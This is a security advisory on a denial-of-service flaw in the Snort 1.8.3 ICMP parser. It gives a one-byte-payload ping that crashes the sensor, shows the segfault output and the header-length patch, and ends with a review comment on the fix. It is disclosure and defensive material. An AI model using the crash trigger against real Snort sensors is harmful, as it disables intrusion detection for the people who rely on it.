COMMAND

    Snort IDS is susceptible to DoS (maybe exploitable remote buffer overflow)

SYSTEMS AFFECTED

    Snort 1.8.3 and probably earlier

PROBLEM

    According to a report by "Sinbad", the Snort ICMP parser is doomed ...
    Example:

        # snort -dev host 192.168.0.3 and 192.168.0.1

    Ping 192.168.0.1 from 192.168.0.3 with one byte of data in the payload:

        # ping -c 1 -s 1 192.168.0.1

    Snort's output is shown below:

        -*> Snort! <*-
        Version 1.8.3 (Build 88)
        By Martin Roesch (roesch@sourcefire.com, www.snort.org)
        01/10-11:34:43.898282 0:80:AD:78:83:BB -> 0:E0:18:C4:52:76 type:0x800 len:0x2B
        192.168.0.3 -> 192.168.0.1 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:29 DF
        Type:8 Code:0 ID:9435 Seq:0 ECHO
        Segmentation fault (core dumped)

SOLUTION

    The following patch has been committed to the Snort 1.8 branch of Snort
    CVS and is included in build 90.

--- olddecode.h Thu Jan 10 15:47:48 2002 +++ decode.h Thu Jan 10 12:15:33 2002 @@ -105,7 +105,7 @@ #define IP_HEADER_LEN 20 #define TCP_HEADER_LEN 20 #define UDP_HEADER_LEN 8 -#define ICMP_HEADER_LEN 8 +#define ICMP_HEADER_LEN 4 #define TH_FIN 0x01 #define TH_SYN 0x02
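
Review bot: The new ICMP_HEADER_LEN value of 4 in decode.h carries no comment saying what it now measures, and the patch shows no call site, so the length checks that depend on it cannot be confirmed from these lines alone. Four bytes covers only the type, code and checksum fields; the echo request in the report also carries ID and Seq (another 4 bytes), so any decoder path that reads those fields, or subtracts their size from the remaining payload length, needs its own minimum-length check before doing so. Suggest adding a comment on the define stating that it is the fixed part of the ICMP header only, and a regression test that feeds the decoder echo packets with ICMP lengths from 4 through 9 bytes.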